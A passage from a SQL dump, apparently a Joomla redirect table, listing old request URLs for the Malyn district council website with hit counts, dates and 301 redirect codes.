00:00:00',301),(26599,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=772:-2011-2012-&Itemid=84&lang=ru&option=com_content&view=article','','','',44,0,'2016-03-01 13:20:42','0000-00-00 00:00:00',301),(26600,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&Itemid=14&lang=en&option=com_content&view=article','','','',22,0,'2016-03-01 13:33:24','0000-00-00 00:00:00',301),(26601,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=975:-2012-2015-&Itemid=88&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-01 13:57:37','0000-00-00 00:00:00',301),(26602,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=563:-30012012185-12&Itemid=76&lang=uk&option=com_content&view=article','','','',5,0,'2016-03-01 14:01:32','0000-00-00 00:00:00',301),(26603,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1221:2014-02-22-08-09-27&Itemid=0&lang=ru&option=com_content&view=article','','','',16,0,'2016-03-01 14:01:40','0000-00-00 00:00:00',301),(26604,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&Itemid=0&lang=ru&option=com_content&view=article','','','',5,0,'2016-03-01 14:01:46','0000-00-00 00:00:00',301),(26605,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=0&lang=en&option=com_content&view=article','','','',26,0,'2016-03-01 14:01:47','0000-00-00 00:00:00',301),(26606,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=939:-18-&Itemid=14&lang=en&option=com_content&view=article','','','',15,0,'2016-03-01 14:01:59','0000-00-00 00:00:00',301),(26607,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=796:2012-10-18-07-54-09&Itemid=84&lang=uk&option=com_content&view=article','','','',27,0,'2016-03-01 14:09:15','0000-00-00 00:00:00',301),(26608,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=513:-lr-2012-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',34,0,'2016-03-01 14:25:21','0000-00-00 00:00:00',301),(26609,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1215:-1200-&Itemid=14&lang=uk&option=com_content&view=article','','','',25,0,'2016-03-01 14:27:03','0000-00-00 00:00:00',301),(26610,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&Itemid=&lang=ru&option=com_content&view=article','','','',18,0,'2016-03-01 14:40:24','0000-00-00 00:00:00',301),(26611,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=796:2012-10-18-07-54-09&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2016-03-01 14:40:25','0000-00-00 00:00:00',301),(26612,'http://www.malyn-rayrada.org.ua/index.php?catid=41:--27042012-&id=663:-------20042012675-12&Itemid=78&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-01 14:46:42','0000-00-00 00:00:00',301),(26613,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&lang=en&option=com_content&view=article','','','',7,0,'2016-03-01 15:00:35','0000-00-00 00:00:00',301),(26614,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&lang=uk&option=com_content&view=article','','','',10,0,'2016-03-01 15:21:46','0000-00-00 00:00:00',301),(26615,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&lang=ru&option=com_content&view=article','','','',12,0,'2016-03-01 15:21:55','0000-00-00 00:00:00',301),(26616,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&lang=uk&option=com_content&view=article','','','',32,0,'2016-03-01 15:28:44','0000-00-00 00:00:00',301),(26617,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&lang=en&option=com_content&view=article','','','',35,0,'2016-03-01 15:28:47','0000-00-00 00:00:00',301),(26618,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=813:2012-11-12-16-44-40&lang=ru&option=com_content&view=article','','','',8,0,'2016-03-01 15:28:48','0000-00-00 00:00:00',301),(26619,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/976-2013-03-21-18-42-06?lang=en','','','',7,0,'2016-03-01 15:28:55','0000-00-00 00:00:00',301),(26620,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/978--6612-?Itemid=0&lang=ru','','','',24,0,'2016-03-01 15:28:58','0000-00-00 00:00:00',301),(26621,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=830:2012-11-27-08-09-31','','','',4,0,'2016-03-01 15:28:59','0000-00-00 00:00:00',301),(26622,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=959:2013-03-11-06-19-41&Itemid=88&lang=ru&option=com_content&view=article','','','',11,0,'2016-03-01 15:53:33','0000-00-00 00:00:00',301),(26623,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1059:2013-07-24-05-42-15','','','',2,0,'2016-03-01 18:27:07','0000-00-00 00:00:00',301),(26624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=566:6-2012-&catid=11&Itemid=14&lang=uk','','','',2,0,'2016-03-01 21:08:06','0000-00-00 00:00:00',301),(26625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=706:---------qq--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2016-03-01 21:45:08','0000-00-00 00:00:00',301),(26626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=791:2012-10-17-06-06-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2016-03-01 21:48:31','0000-00-00 00:00:00',301),(26627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2016-03-01 21:49:13','0000-00-00 00:00:00',301),(26628,'http://malyn-rayrada.org.ua/index.php?Itemid=64&catid=32:2011-03-31-12-03-04&id=641:2012-04-03-12-52-00&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-01 22:26:18','0000-00-00 00:00:00',301),(26629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=646:2012-04-08-07-58-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-03-01 23:29:12','0000-00-00 00:00:00',301),(26630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&Itemid=14&lang=uk','','','',2,0,'2016-03-01 23:38:51','0000-00-00 00:00:00',301),(26631,'http://malyn-rayrada.org.ua/config.php','','','',1,0,'2016-03-02 03:00:26','0000-00-00 00:00:00',301),(26632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&Itemid=14&lang=uk','','','',3,0,'2016-03-02 06:02:47','0000-00-00 00:00:00',301),(26633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2016-03-02 08:28:21','0000-00-00 00:00:00',301),(26634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=225:--2011----&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2016-03-02 08:31:28','0000-00-00 00:00:00',301),(26635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36:2011-07-21-07-51-53&layout=blog&Itemid=70&lang=uk','','','',1,0,'2016-03-02 09:43:40','0000-00-00 00:00:00',301),(26636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=123:2010-09-09-11-29-29&catid=11&Itemid=16&lang=en','','','',1,0,'2016-03-02 09:46:02','0000-00-00 00:00:00',301),(26637,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=413:-2011-2012-&Itemid=72&lang=en&option=com_content&view=article','','','',12,0,'2016-03-02 11:46:35','0000-00-00 00:00:00',301),(26638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=178:2010-11-26-15-59-33&catid=11&Itemid=16&lang=en','','','',1,0,'2016-03-02 11:47:19','0000-00-00 00:00:00',301),(26639,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=5','','','',2,0,'2016-03-02 12:45:21','0000-00-00 00:00:00',301),(26640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-03-02 12:46:51','0000-00-00 00:00:00',301),(26641,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=ru&start=10','','','',3,0,'2016-03-02 12:48:39','0000-00-00 00:00:00',301),(26642,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=ru&start=15','','','',3,0,'2016-03-02 12:53:13','0000-00-00 00:00:00',301),(26644,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=30','','','',4,0,'2016-03-02 12:55:04','0000-00-00 00:00:00',301),(26645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=566:6-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-03-02 12:55:22','0000-00-00 00:00:00',301),(26647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=103:2010-08-12-06-54-56&catid=26:--11082010-&Itemid=54&lang=uk','','','',1,0,'2016-03-02 13:47:44','0000-00-00 00:00:00',301),(26648,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/1106--qq?lang=en&Itemid=0','','','',8,0,'2016-03-02 13:48:43','0000-00-00 00:00:00',301),(26649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&Itemid=14&lang=ru','','','',1,0,'2016-03-02 14:50:34','0000-00-00 00:00:00',301),(26650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=803:-2012-&catid=11&lang=ru','','','',1,0,'2016-03-02 14:54:53','0000-00-00 00:00:00',301),(26651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=486:-l-28r&catid=38&Itemid=73&lang=uk','','','',1,0,'2016-03-02 14:58:22','0000-00-00 00:00:00',301),(26654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=344:2011-06-15-12-25-27&catid=34:--15062011-&Itemid=68&lang=en','','','',2,0,'2016-03-02 16:49:45','0000-00-00 00:00:00',301),(26655,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=en&start=15','','','',2,0,'2016-03-02 16:56:41','0000-00-00 00:00:00',301),(26657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-03-02 18:43:40','0000-00-00 00:00:00',301),(26659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=ru&limitstart=5','','','',1,0,'2016-03-02 18:45:41','0000-00-00 00:00:00',301),(26660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=344:2011-06-15-12-25-27&catid=34:--15062011-&Itemid=68&lang=uk','','','',1,0,'2016-03-02 18:48:11','0000-00-00 00:00:00',301),(26661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=588:2012-02-27-13-48-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2016-03-02 18:52:29','0000-00-00 00:00:00',301),(26662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=486:-l-28r&catid=38:--19122011-&Itemid=73&lang=ru','','','',1,0,'2016-03-02 18:53:41','0000-00-00 00:00:00',301),(26663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=588:2012-02-27-13-48-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2016-03-02 18:56:04','0000-00-00 00:00:00',301),(26664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=601:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-03-02 19:15:37','0000-00-00 00:00:00',301),(26665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=en&limitstart=15','','','',2,0,'2016-03-02 19:27:48','0000-00-00 00:00:00',301),(26666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=39&Itemid=76&lang=ru','','','',2,0,'2016-03-02 19:50:53','0000-00-00 00:00:00',301),(26667,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/18-2010-06-06-10-06-41?Itemid=0&lang=uk','','','',1,0,'2016-03-02 20:08:07','0000-00-00 00:00:00',301),(26668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=346:2011-06-15-12-31-02&catid=34&Itemid=68&lang=uk','','','',1,0,'2016-03-02 20:47:01','0000-00-00 00:00:00',301),(26669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=525:2011-12-30-10-19-27&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2016-03-02 20:51:09','0000-00-00 00:00:00',301),(26670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=488:2011-12-02-06-34-46&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2016-03-02 20:51:54','0000-00-00 00:00:00',301),(26671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=921:-18-6-20-2013-&catid=11&Itemid=14&lang=en','','','',1,0,'2016-03-02 20:52:52','0000-00-00 00:00:00',301),(26672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=36&Itemid=70&lang=ru','','','',1,0,'2016-03-02 21:17:24','0000-00-00 00:00:00',301),(26673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1050:2013-07-15-13-52-21&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-03-02 21:18:03','0000-00-00 00:00:00',301),(26674,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1351:-2014-&catid=59:--20062014-&lang=uk','','','',6,0,'2016-03-02 22:14:01','0000-00-00 00:00:00',301),(26675,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=uk&limitstart=15','','','',1,0,'2016-03-02 23:05:02','0000-00-00 00:00:00',301),(26677,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-?start=10','','','',3,0,'2016-03-02 23:24:17','0000-00-00 00:00:00',301),(26678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=ru&limitstart=15','','','',1,0,'2016-03-02 23:34:35','0000-00-00 00:00:00',301),(26679,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&limitstart=0','','','',1,0,'2016-03-02 23:35:10','0000-00-00 00:00:00',301),(26680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2016-03-02 23:39:59','0000-00-00 00:00:00',301),(26681,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=93:-----------2007-2010-&catid=26&Itemid=54&lang=ru','','','',2,0,'2016-03-02 23:49:29','0000-00-00 00:00:00',301),(26682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=678:----------------2012-2014-&catid=42:--16052012-&Itemid=80&lang=en','','','',22,0,'2016-03-02 23:51:31','0000-00-00 00:00:00',301),(26683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=421:2011-09-30-14-14-22&catid=11&Itemid=14&lang=en','','','',1,0,'2016-03-03 00:08:54','0000-00-00 00:00:00',301),(26684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=594:-lr-&catid=40&Itemid=77&lang=en','','','',1,0,'2016-03-03 00:13:00','0000-00-00 00:00:00',301),(26686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=36&Itemid=70&lang=uk','','','',1,0,'2016-03-03 01:30:39','0000-00-00 00:00:00',301),(26687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=ru&limitstart=15','','','',1,0,'2016-03-03 02:03:11','0000-00-00 00:00:00',301),(26688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&lang=en&Itemid=','','','',1,0,'2016-03-03 02:06:35','0000-00-00 00:00:00',301),(26690,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1244:-2014-2018-&catid=58:--30042014-&lang=en','','','',1,0,'2016-03-03 02:27:15','0000-00-00 00:00:00',301),(26691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=97:2010-08-12-06-27-31&catid=26:--11082010-&Itemid=54&lang=uk','','','',1,0,'2016-03-03 03:15:11','0000-00-00 00:00:00',301),(26692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=39&Itemid=76&lang=en','','','',1,0,'2016-03-03 03:20:36','0000-00-00 00:00:00',301),(26693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=898:-14-112012332-l-r&catid=36&Itemid=70&lang=ru','','','',7,0,'2016-03-03 03:22:56','0000-00-00 00:00:00',301),(26694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=ru&limitstart=15','','','',1,0,'2016-03-03 03:23:57','0000-00-00 00:00:00',301),(26695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=en&limitstart=15','','','',1,0,'2016-03-03 03:27:30','0000-00-00 00:00:00',301),(26696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=127:2010-09-15-10-02-36&catid=11&Itemid=16&lang=uk','','','',1,0,'2016-03-03 03:28:08','0000-00-00 00:00:00',301),(26697,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1244:-2014-2018-&catid=58&lang=uk','','','',6,0,'2016-03-03 03:30:31','0000-00-00 00:00:00',301),(26698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=en&limitstart=10','','','',1,0,'2016-03-03 03:48:59','0000-00-00 00:00:00',301),(26699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=en','','','',1,0,'2016-03-03 03:49:30','0000-00-00 00:00:00',301),(26700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=ru','','','',1,0,'2016-03-03 03:51:19','0000-00-00 00:00:00',301),(26701,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=uk&start=5','','','',1,0,'2016-03-03 03:54:07','0000-00-00 00:00:00',301),(26702,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27?page=2','','','',3,0,'2016-03-03 04:18:02','0000-00-00 00:00:00',301),(26703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2016-03-03 05:17:51','0000-00-00 00:00:00',301),(26704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=193:------------2009-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2016-03-03 05:19:48','0000-00-00 00:00:00',301),(26705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=89&lang=en&limitstart=15','','','',1,0,'2016-03-03 05:19:55','0000-00-00 00:00:00',301),(26706,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=30','','','',1,0,'2016-03-03 05:23:01','0000-00-00 00:00:00',301),(26707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2016-03-03 05:28:41','0000-00-00 00:00:00',301),(26708,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1340:-l-28r&catid=59&lang=uk','','','',5,0,'2016-03-03 05:30:25','0000-00-00 00:00:00',301),(26709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=561:2012-02-02-08-58-39&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2016-03-03 06:35:32','0000-00-00 00:00:00',301),(26710,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1304:2014-04-30-09-11-23&catid=58:--30042014-&lang=ru','','','',6,0,'2016-03-03 07:00:52','0000-00-00 00:00:00',301),(26721,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&catid=43&Itemid=82&lang=uk','','','',1,0,'2016-03-03 19:22:04','0000-00-00 00:00:00',301),(26722,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=976:2013-03-21-18-42-06&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-03 23:11:48','0000-00-00 00:00:00',301),(26723,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37&Itemid=72&lang=ru','','','',2,0,'2016-03-03 23:41:16','0000-00-00 00:00:00',301),(26724,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1102-2013-10-03-08-08-33?Itemid=0&lang=ru','','','',2,0,'2016-03-04 08:09:07','0000-00-00 00:00:00',301),(26725,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1292:-i-&Itemid=14&lang=en&option=com_content&view=article','','','',10,0,'2016-03-04 08:22:43','0000-00-00 00:00:00',301),(26726,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=845:-2012-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',7,0,'2016-03-04 08:22:58','0000-00-00 00:00:00',301),(26727,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=10','','','',1,0,'2016-03-04 08:23:42','0000-00-00 00:00:00',301),(26728,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42:--16052012-&Itemid=80&lang=ru','','','',1,0,'2016-03-04 08:24:21','0000-00-00 00:00:00',301),(26729,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1254:-1-50&Itemid=14&lang=en&option=com_content&view=article','','','',16,0,'2016-03-04 08:37:19','0000-00-00 00:00:00',301),(26730,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:-27042012252&catid=43&Itemid=82&lang=uk','','','',1,0,'2016-03-04 08:38:21','0000-00-00 00:00:00',301),(26731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45:--14112012-&Itemid=84&lang=en','','','',3,0,'2016-03-04 08:38:46','0000-00-00 00:00:00',301),(26732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=ru','','','',4,0,'2016-03-04 08:40:46','0000-00-00 00:00:00',301),(26733,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1102-2013-10-03-08-08-33?lang=uk&Itemid=0','','','',8,0,'2016-03-04 08:45:56','0000-00-00 00:00:00',301),(26734,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=829:24-1600-l-r&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2016-03-04 08:50:35','0000-00-00 00:00:00',301),(26735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=710:2012-06-14-15-07-29&catid=36&Itemid=70&lang=en','','','',3,0,'2016-03-04 08:59:08','0000-00-00 00:00:00',301),(26736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=408:-2011-&catid=37:--21102011-&Itemid=72&lang=uk','','','',3,0,'2016-03-04 09:01:18','0000-00-00 00:00:00',301),(26737,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1238:2014-03-09-06-41-00&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-04 09:03:22','0000-00-00 00:00:00',301),(26738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2016-03-04 09:19:38','0000-00-00 00:00:00',301),(26739,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=990:-2013-','','','',3,0,'2016-03-04 09:31:58','0000-00-00 00:00:00',301),(26740,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/990--2013-?lang=en&Itemid=0','','','',10,0,'2016-03-04 09:36:06','0000-00-00 00:00:00',301),(26741,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1102:2013-10-03-08-08-33','','','',21,0,'2016-03-04 09:38:38','0000-00-00 00:00:00',301),(26742,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/991-2013-04-22-08-24-54?lang=uk','','','',21,0,'2016-03-04 09:48:25','0000-00-00 00:00:00',301),(26743,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/730-2012-07-02-05-04-18?lang=ru','','','',8,0,'2016-03-04 09:56:34','0000-00-00 00:00:00',301),(26744,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/962-pro-vstanovlennya-orendnoji-plati','','','',9,0,'2016-03-04 09:56:55','0000-00-00 00:00:00',301),(26745,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/941-2013-02-27-14-30-15?lang=uk','','','',23,0,'2016-03-04 09:57:57','0000-00-00 00:00:00',301),(26746,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1238-2014-03-09-06-41-00?lang=uk','','','',2,0,'2016-03-04 09:58:01','0000-00-00 00:00:00',301),(26747,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=1173:2014-01-15-10-37-18','','','',8,0,'2016-03-04 09:59:04','0000-00-00 00:00:00',301),(26748,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1238-2014-03-09-06-41-00?Itemid=0&lang=uk','','','',8,0,'2016-03-04 10:00:21','0000-00-00 00:00:00',301),(26749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',56,0,'2016-03-04 10:02:17','0000-00-00 00:00:00',301),(26750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=45&Itemid=84&lang=en','','','',5,0,'2016-03-04 10:02:28','0000-00-00 00:00:00',301),(26751,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=40','','','',10,0,'2016-03-04 10:02:31','0000-00-00 00:00:00',301),(26752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&catid=34:--15062011-&Itemid=68&lang=ru','','','',8,0,'2016-03-04 10:02:33','0000-00-00 00:00:00',301),(26753,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1238:2014-03-09-06-41-00&lang=uk&option=com_content&view=article','','','',24,0,'2016-03-04 10:02:34','0000-00-00 00:00:00',301),(26754,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/976-2013-03-21-18-42-06?lang=uk','','','',1,0,'2016-03-04 11:22:56','0000-00-00 00:00:00',301),(26755,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=455:2011-11-10-13-39-05&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-04 11:41:39','0000-00-00 00:00:00',301),(26756,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37:--21102011-&Itemid=72&lang=en','','','',4,0,'2016-03-04 14:55:36','0000-00-00 